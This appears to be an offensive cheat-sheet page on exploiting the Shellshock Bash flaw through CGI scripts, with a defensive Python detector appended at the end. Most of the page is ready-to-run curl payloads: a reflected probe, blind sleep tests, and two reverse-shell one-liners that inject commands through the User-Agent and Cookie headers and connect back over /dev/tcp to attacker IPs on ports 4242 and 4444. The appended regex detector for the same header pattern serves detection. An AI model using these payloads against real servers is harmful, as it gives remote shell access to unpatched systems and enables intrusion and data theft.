
CGI

ShellShock

Bash can also be used to run commands passed to it by applications, and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes run on a computer. The vulnerability lies in the fact that an attacker can append malicious code to the value of an environment variable, and that code runs as soon as Bash receives the variable. Exploiting this vulnerability may cause the page to throw an error. You can spot this vulnerability by noticing that the server runs an old Apache version with mod_cgi (and a cgi-bin folder), or by using nikto.

Reflected

curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null | grep 'VULNERABLE'

Blind with sleep

(You could also make the target ping or send a web request to a host you control and watch for it with tcpdump.)

curl -k -H 'User-Agent: () { :; }; sleep 5' https://10.129.1.226:10000/left.cgi
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi

Out-Of-Band Use

Cookie as alternative to User-Agent

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Reverse shell

curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' https://10.129.1.226:10000/left.cgi
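As an added example that is not part of the original page, a small Python detector that flags the function-definition prefix the requests above place in User-Agent and Cookie headers, for use over captured request headers or access logs; the sample requests below are constructed and the host name is a placeholder.

```python
import re
import urllib.parse

# Constructed sample requests (not captured from any real server). The
# fourth one carries the same payload URL-encoded inside a Referer.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0", "Cookie": "session=abc"},
    {"User-Agent": "() { :; }; echo VULNERABLE"},
    {"Cookie": '() { :;}; /bin/bash -c "sleep 5"'},
    {"Referer": "http://example.invalid/?x=%28%29%20%7B%20%3A%3B%20%7D%3B%20id"},
    {"User-Agent": "curl/7.88.1"},
]

# Vulnerable Bash treats a value starting with "() {" as an exported function
# definition and keeps parsing past the closing "}", so the signature is the
# empty function body followed by ";" and trailing commands. The pattern is
# not anchored to the start of the value so that payloads wrapped in query
# strings or other headers are also flagged.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def is_shellshock(value):
    """True if a header value carries a Shellshock-style function definition."""
    decoded = urllib.parse.unquote(value)  # undo %28%29 style encoding first
    return bool(SHELLSHOCK_RE.search(decoded))


def flag_request(headers):
    """Return the names of the headers in one request that match."""
    return [name for name, value in headers.items() if is_shellshock(value)]


def scan(requests):
    """Return (index, [flagged header names]) for every suspicious request."""
    hits = []
    for i, headers in enumerate(requests):
        flagged = flag_request(headers)
        if flagged:
            hits.append((i, flagged))
    return hits


if __name__ == "__main__":
    for index, names in scan(SAMPLE_REQUESTS):
        print(f"request {index}: Shellshock pattern in {', '.join(names)}")
```

The same regex works as a grep or WAF rule; a patched Bash ignores the trailing commands, but a matching request is still worth alerting on as a probe.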